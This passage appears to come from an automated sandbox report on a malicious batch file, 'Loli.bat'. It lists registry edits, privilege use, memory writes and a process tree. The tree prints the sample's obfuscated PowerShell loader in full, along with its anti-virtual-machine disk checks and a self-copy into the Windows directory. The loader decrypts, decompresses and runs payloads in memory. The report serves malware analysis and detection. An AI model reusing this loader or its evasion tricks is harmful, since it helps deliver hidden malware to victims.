Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02fsmtaivvxucroq\Provision Wednesday, January 01, 2025 03:56:14 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAQbJ3SKpLikOXAFs4zCq7cgAAAAACAAAAAAAQZgAAAAEAACAAAAAU4+IbUWusHMUz+QdFhv97z0cehfBAAN9EinZRBo75SwAAAAAOgAAAAAIAACAAAABpAVugHLafuDI3YdcfEfRevRJOfy+dV5cxroi8bkoqdSAAAABisESVxgHf8N4BlQARmqbzalhqFNgEzFrlqqN9FGw3BUAAAACFVRJtuOt/0URY0QMHpA11u3jrOhwOZiI530UjhRDzrTh8wqQlAePbtFTmItwy7/M1m1u5fygKTQdY8mgILNx5"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3227495264-2217614367-4027411560-1000\02cxaobyoycdgrkd\AppIdList	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\Name = "DIDC"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId = "02fsmtaivvxucroq"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 01 Jan 2025 03:57:36 GMT"	OfficeClickToRun.exe

Modifies registry class 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1404	powershell.exe
1404	powershell.exe
2732	msedge.exe
2732	msedge.exe
1416	msedge.exe
1416	msedge.exe
1404	powershell.exe
1404	powershell.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
2804	powershell.exe
2804	powershell.exe
2804	powershell.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
2804	powershell.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
2804	powershell.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe
4256	dllhost.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1404	powershell.exe
Token: SeDebugPrivilege	4256	dllhost.exe
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeAuditPrivilege	2056	svchost.exe
Token: SeAuditPrivilege	2056	svchost.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeTcbPrivilege	5352	svchost.exe
Token: SeTcbPrivilege	5352	svchost.exe
Token: SeTcbPrivilege	5352	svchost.exe
Token: SeTcbPrivilege	5352	svchost.exe
Token: SeTcbPrivilege	5352	svchost.exe
Token: SeDebugPrivilege	5932	dllhost.exe
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeShutdownPrivilege	5752	svchost.exe
Token: SeCreatePagefilePrivilege	5752	svchost.exe
Token: SeShutdownPrivilege	5752	svchost.exe
Token: SeCreatePagefilePrivilege	5752	svchost.exe
Token: SeShutdownPrivilege	5752	svchost.exe
Token: SeCreatePagefilePrivilege	5752	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2552	svchost.exe
Token: SeIncreaseQuotaPrivilege	2552	svchost.exe
Token: SeSecurityPrivilege	2552	svchost.exe
Token: SeTakeOwnershipPrivilege	2552	svchost.exe
Token: SeLoadDriverPrivilege	2552	svchost.exe
Token: SeBackupPrivilege	2552	svchost.exe
Token: SeRestorePrivilege	2552	svchost.exe
Token: SeShutdownPrivilege	2552	svchost.exe
Token: SeSystemEnvironmentPrivilege	2552	svchost.exe
Token: SeManageVolumePrivilege	2552	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2552	svchost.exe
Token: SeIncreaseQuotaPrivilege	2552	svchost.exe
Token: SeSecurityPrivilege	2552	svchost.exe
Token: SeTakeOwnershipPrivilege	2552	svchost.exe
Token: SeLoadDriverPrivilege	2552	svchost.exe
Token: SeSystemtimePrivilege	2552	svchost.exe
Token: SeBackupPrivilege	2552	svchost.exe
Token: SeRestorePrivilege	2552	svchost.exe
Token: SeShutdownPrivilege	2552	svchost.exe
Token: SeSystemEnvironmentPrivilege	2552	svchost.exe
Token: SeUndockPrivilege	2552	svchost.exe
Token: SeManageVolumePrivilege	2552	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2552	svchost.exe
Token: SeIncreaseQuotaPrivilege	2552	svchost.exe
Token: SeSecurityPrivilege	2552	svchost.exe
Token: SeTakeOwnershipPrivilege	2552	svchost.exe
Token: SeLoadDriverPrivilege	2552	svchost.exe
Token: SeSystemtimePrivilege	2552	svchost.exe
Token: SeBackupPrivilege	2552	svchost.exe
Token: SeRestorePrivilege	2552	svchost.exe
Token: SeShutdownPrivilege	2552	svchost.exe
Token: SeSystemEnvironmentPrivilege	2552	svchost.exe
Token: SeUndockPrivilege	2552	svchost.exe
Token: SeManageVolumePrivilege	2552	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2552	svchost.exe

Suspicious use of FindShellTrayWindow 29 IoCs

pid	Process
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE

Suspicious use of SendNotifyMessage 42 IoCs

pid	Process
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
1416	msedge.exe
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4252	Conhost.exe
2804	powershell.exe
3368	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1048 wrote to memory of 3152	1048	cmd.exe	84
PID 1048 wrote to memory of 3152	1048	cmd.exe	84
PID 1048 wrote to memory of 2924	1048	cmd.exe	85
PID 1048 wrote to memory of 2924	1048	cmd.exe	85
PID 1048 wrote to memory of 4916	1048	cmd.exe	86
PID 1048 wrote to memory of 4916	1048	cmd.exe	86
PID 1048 wrote to memory of 1404	1048	cmd.exe	87
PID 1048 wrote to memory of 1404	1048	cmd.exe	87
PID 1416 wrote to memory of 1960	1416	msedge.exe	90
PID 1416 wrote to memory of 1960	1416	msedge.exe	90
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2992	1416	msedge.exe	91
PID 1416 wrote to memory of 2732	1416	msedge.exe	92
PID 1416 wrote to memory of 2732	1416	msedge.exe	92
PID 1416 wrote to memory of 5036	1416	msedge.exe	93
PID 1416 wrote to memory of 5036	1416	msedge.exe	93
PID 1416 wrote to memory of 5036	1416	msedge.exe	93
PID 1416 wrote to memory of 5036	1416	msedge.exe	93
PID 1416 wrote to memory of 5036	1416	msedge.exe	93
PID 1416 wrote to memory of 5036	1416	msedge.exe	93
PID 1416 wrote to memory of 5036	1416	msedge.exe	93
PID 1416 wrote to memory of 5036	1416	msedge.exe	93
PID 1416 wrote to memory of 5036	1416	msedge.exe	93
PID 1416 wrote to memory of 5036	1416	msedge.exe	93
PID 1416 wrote to memory of 5036	1416	msedge.exe	93
PID 1416 wrote to memory of 5036	1416	msedge.exe	93

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:596
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:984
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{394c9b6a-f88c-40ea-bc8b-2aaf370c2998}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4256
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b16eb32d-f44a-4ad6-9672-f55cbf0ef65b}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5932

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Drops file in System32 directory
PID:652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:432

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1220
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1492
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1500

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1672

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1796
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x4f8 0x4f0
  2⤵
  PID:7480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1904

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1936

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1992

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1508

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2056

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2396

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2516

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2340

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3356

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1048
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4224
- - C:\Windows\system32\fsutil.exe
    fsutil fsinfo drives
    3⤵
    PID:3152
- - C:\Windows\system32\findstr.exe
    findstr /i /c:"WDS100T2B0A" /c:"QEMU HARDDISK" /c:"DADY HARDDISK"
    3⤵
    PID:2924
- - C:\Windows\system32\cmd.exe
    cmd.exe /c echo function OaEd($Lhlb){ Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$KNIa=[zYSzYyzYszYtzYezYmzY.zYSezYcuzYrzYizYtyzY.zYCzYrzYypzYtzYozYgrzYazYphzYyzY.zYAzYezYszY]:zY:zYCzYrezYazYtezY()zY;'.Replace('zY', ''); Invoke-Expression -WarningAction Inquire -Debug -Verbose '$KNIa.MLWoLWdLWeLW=LW[LWSLWyLWstLWemLW.LWSLWecLWuLWrLWiLWtyLW.LWCLWryLWpLWtoLWgLWrLWaLWpLWhLWy.LWCLWiLWphLWeLWrMLWodLWeLW]:LW:LWCBLWCLW;'.Replace('LW', ''); Invoke-Expression -WarningAction Inquire -Verbose '$KNIa.PHaaHadHadHaiHanHagHa=Ha[SHaysHatHaeHam.HaSHaeHacHaurHaiHatHay.HaCHaryHapHatHaoHagHarHaapHahHayHa.PHaaHaddHainHagHaMoHadHae]Ha:Ha:HaPHaKHaCSHa7;'.Replace('Ha', ''); Invoke-Expression -InformationAction Ignore '$KNIa.KxUexUyxU=xU[xUSxUyxUsxUtexUm.xUCxUoxUnvxUexUrxUtxU]:xU:xUFxUroxUmxUBaxUsxUexU6xU4xUSxUtrxUixUnxUg("FxUbxUbxU4xUmxUoxUUxUOxUGPxUwrxUfxUQxUh1xUrxUlxUKxUcCxUhxUoxUPLxU/xUZxxUnxUsxUMxUmxU4xU6exUixUVxUmVxUrxUjcxU4=xU");'.Replace('xU', ''); Invoke-Expression -Debug '$KNIa.IVBVVB=VB[VBSVByVBsVBtVBemVB.CVBoVBnVBveVBrVBtVB]VB::VBFVBrVBomVBBVBasVBeVB6VB4VBSVBtVBriVBnVBg("lVBlVBuVBFVB/VBpVBeVBMVB9IVBfDVBMVBVVB3oVBHVBUVB3VBC5VBgVB=VB=");'.Replace('VB', ''); $xPYT=$KNIa.CreateDecryptor(); $BQvO=$xPYT.TransformFinalBlock($Lhlb, 0, $Lhlb.Length); $xPYT.Dispose(); $KNIa.Dispose(); $BQvO;}function OkiP($Lhlb){ Invoke-Expression -InformationAction Ignore -Verbose '$ZKQY=Ncdecdwcd-cdOcdbcdjcdecdctcd Scdycdscdtecdmcd.cdIcdO.cdMcdecdmocdrcdyScdtcdrcdecdacdm(,$Lhlb);'.Replace('cd', ''); Invoke-Expression -InformationAction Ignore '$SIsz=Ncdecdwcd-cdOcdbcdjcdecdctcd Scdycdscdtecdmcd.cdIcdO.cdMcdecdmocdrcdyScdtcdrcdecdacdm;'.Replace('cd', ''); Invoke-Expression -Debug -InformationAction Ignore '$Cswx=Nbnebnwbn-bnObnbbnjbnebnctbn Sbnybnsbntebnmbn.bnIbnO.bnCbnobnmpbnrbnesbnsbnibnobnnbn.bnGZbnibnpbnStbnrbneabnm($ZKQY, [bnIbnObn.bnCbnobnmbnpbnrebnssbnibnobnn.bnCbnobnmbnprbnebnsbnsibnobnnMbnobndbnebn]bn:bn:Dbnebncbnombnpbnrebnssbn);'.Replace('bn', ''); $Cswx.CopyTo($SIsz); $Cswx.Dispose(); $ZKQY.Dispose(); $SIsz.Dispose(); $SIsz.ToArray();}function xNUW($Lhlb,$PBcK){ Invoke-Expression -WarningAction Inquire '$ibma=[WNSWNyWNsWNtWNeWNmWN.WNReWNflWNeWNcWNtiWNoWNnWN.WNAsWNsWNeWNmbWNlWNy]WN:WN:WNLWNoWNaWNd([byte[]]$Lhlb);'.Replace('WN', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose -Debug '$mOyP=$ibma.EdXndXtdXrdXydXPdXodXidXntdX;'.Replace('dX', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$mOyP.IFIIFnIFvIFoIFkIFeIF(IF$nIFulIFlIF, $PBcK);'.Replace('IF', '');}$apiD = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $apiD;$fTnD=[System.IO.File]::ReadAllText($apiD).Split([Environment]::NewLine);foreach ($kbxa in $fTnD) { if ($kbxa.StartsWith('dzqCD')) { $XAms=$kbxa.Substring(5); break; }}$JuAS=[string[]]$XAms.Split('\');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$wKg = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');Invoke-Expression -InformationAction Ignore '$qzk = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$LwB = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');xNUW $wKg $null;xNUW $qzk $null;xNUW $LwB (,[string[]] (''));
    3⤵
    PID:4916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loli.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
      4⤵
      Drops file in Windows directory
      PID:2428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
      4⤵
      PID:4404
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4252
    - - C:\Windows\system32\fsutil.exe
        
        fsutil fsinfo drives
        5⤵
        
        PID:1964
    - - C:\Windows\system32\findstr.exe
        
        findstr /i /c:"WDS100T2B0A" /c:"QEMU HARDDISK" /c:"DADY HARDDISK"
        5⤵
        
        PID:4820
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c echo function OaEd($Lhlb){ Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$KNIa=[zYSzYyzYszYtzYezYmzY.zYSezYcuzYrzYizYtyzY.zYCzYrzYypzYtzYozYgrzYazYphzYyzY.zYAzYezYszY]:zY:zYCzYrezYazYtezY()zY;'.Replace('zY', ''); Invoke-Expression -WarningAction Inquire -Debug -Verbose '$KNIa.MLWoLWdLWeLW=LW[LWSLWyLWstLWemLW.LWSLWecLWuLWrLWiLWtyLW.LWCLWryLWpLWtoLWgLWrLWaLWpLWhLWy.LWCLWiLWphLWeLWrMLWodLWeLW]:LW:LWCBLWCLW;'.Replace('LW', ''); Invoke-Expression -WarningAction Inquire -Verbose '$KNIa.PHaaHadHadHaiHanHagHa=Ha[SHaysHatHaeHam.HaSHaeHacHaurHaiHatHay.HaCHaryHapHatHaoHagHarHaapHahHayHa.PHaaHaddHainHagHaMoHadHae]Ha:Ha:HaPHaKHaCSHa7;'.Replace('Ha', ''); Invoke-Expression -InformationAction Ignore '$KNIa.KxUexUyxU=xU[xUSxUyxUsxUtexUm.xUCxUoxUnvxUexUrxUtxU]:xU:xUFxUroxUmxUBaxUsxUexU6xU4xUSxUtrxUixUnxUg("FxUbxUbxU4xUmxUoxUUxUOxUGPxUwrxUfxUQxUh1xUrxUlxUKxUcCxUhxUoxUPLxU/xUZxxUnxUsxUMxUmxU4xU6exUixUVxUmVxUrxUjcxU4=xU");'.Replace('xU', ''); Invoke-Expression -Debug '$KNIa.IVBVVB=VB[VBSVByVBsVBtVBemVB.CVBoVBnVBveVBrVBtVB]VB::VBFVBrVBomVBBVBasVBeVB6VB4VBSVBtVBriVBnVBg("lVBlVBuVBFVB/VBpVBeVBMVB9IVBfDVBMVBVVB3oVBHVBUVB3VBC5VBgVB=VB=");'.Replace('VB', ''); 